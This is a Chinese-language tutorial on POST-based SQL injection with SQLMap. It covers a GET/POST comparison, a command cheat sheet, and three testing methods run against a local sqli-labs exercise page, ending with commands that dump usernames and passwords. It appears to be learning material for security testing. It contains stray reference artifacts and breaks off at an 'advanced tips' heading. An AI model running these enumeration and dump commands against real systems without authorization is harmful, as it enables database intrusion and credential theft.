当前位置：首页 > news >正文

【SQLMap】POST请求注入

news 2025/9/16 6:49:55

SQL注入是Web安全领域最常见的高危漏洞之一，而POST型注入因其数据不可见性，在测试中需要特殊处理。SQLMap作为自动化SQL注入工具，能高效地帮助我们发现和利用这类漏洞。

POST注入与GET注入的关键区别

POST注入与GET注入的核心区别在于数据传递方式不同

特性	GET请求	POST请求
数据传输方式	通过URL传递（参数在地址栏可见）	通过请求体传递（数据不可见）
数据量限制	较小，受URL长度限制	较大，无URL长度限制
安全性	较低，参数易被缓存和记录	相对较高
测试可见性	直接可见，易于测试	不可见，需抓包或工具辅助

SQLMap 常用命令速查表

命令参数	功能说明	使用示例
`-u <URL>`	指定目标URL（最常用）	`sqlmap -u "http://example.com/page.php?id=1"`
`--data=<DATA>`	指定POST请求的数据	`sqlmap -u "http://example.com/login.php" --data="username=admin&password=pass"`
`-r <FILE>`	从文件加载HTTP请求（常用于POST注入）	`sqlmap -r request.txt`(文件通常由BurpSuite抓包保存)
`-p`	指定测试的参数	`sqlmap -u "http://example.com/page.php?id=1&cat=2" -p "id"`(只测试`id`参数)
`--forms`	自动检测并测试页面中的表单	`sqlmap -u "http://example.com/login.php" --forms`
`--current-db`	获取当前数据库名	`sqlmap -u "http://example.com/page.php?id=1" --current-db`
`--dbs`	枚举所有数据库	`sqlmap -u "http://example.com/page.php?id=1" --dbs`
`--tables`	枚举指定数据库中的所有表	`sqlmap -u "http://example.com/page.php?id=1" -D <database_name> --tables`
`--columns`	枚举指定表中的所有列	`sqlmap -u "http://example.com/page.php?id=1" -D <database_name> -T <table_name> --columns`
`--dump`	导出（提取）指定表中的数据	`sqlmap -u "http://example.com/page.php?id=1" -D <database_name> -T <table_name> --dump`
`--batch`	使用非交互模式（自动选择默认选项）	通常加在其他命令后，避免SQLMap中途询问
`--level=<LEVEL>`	设置测试等级（1-5，默认1）等级越高，测试越全面。	`--level=3`(会检测User-Agent、Referer头)
`--risk=<RISK>`	设置风险等级（1-3，默认1）等级越高，测试越具侵入性	`--risk=2`

SQLMap进行POST注入的实战方法

一：BurpSuite抓包+文件读取

此方法利用BurpSuite等抓包工具捕获完整的POST请求，保存为文件后供SQLMap直接读取，准确性高。

抓包并保存：使用BurpSuite拦截POST请求，将完整请求（包括Headers和Body）复制保存为文本文件（如1.txt）
使用SQLMap读取文件进行测试

sqlmap.py -r C:\Users\emma\OneDrive\桌面\1.txt -p uname -dbs # 基本命令

sqlmap.py -r C:\Users\emma\OneDrive\桌面\1.txt --current-db #展示网站库名

sqlmap.py -r C:\Users\emma\OneDrive\桌面\1.txt -p uname -D security --tables # 获取指定数据库(security)的所有表

sqlmap.py -r C:\Users\emma\OneDrive\桌面\1.txt -p uname -D security -T users --columns # 获取指定表(users)的所有列

指定参数。在1.txt文件中指定要扫描的参数，其他就参数不会扫描

sqlmap.py -r C:\Users\emma\OneDrive\桌面\1.txt --dbs

sqlmap.py -r C:\Users\emma\OneDrive\桌面\1.txt -p username -D security -T users -C username,password --dump

二：自动表单检测（--forms）

让SQLMap自动分析目标页面，发现并测试所有表单。

让SQLMap自动发现并测试表单

sqlmap.py -u "http://localhost/sql/Less-12/index.php" --forms --dbs

优点：无需抓包，快速便捷。
缺点：可能无法检测到所有参数（如Headers或Cookie中的参数）

三：直接指定POST数据（--data）

手动指定POST请求的参数进行测试。

# 直接通过--data指定POST参数 sqlmap.py -u "http://localhost/sql/Less-12/index.php" --data="username=admin&password=123456"[1,4](@ref)

# 指定请求方法为POST（某些场景需要） sqlmap.py -u "http://localhost/sql/Less-12/index.php" --data="username=admin&password=123456" --method=POST[4](@ref)

# 结合其他参数指定测试字段 sqlmap.py -u "http://localhost/sql/Less-12/index.php" --data="username=admin&password=123456" -p username --dbs

高级技巧：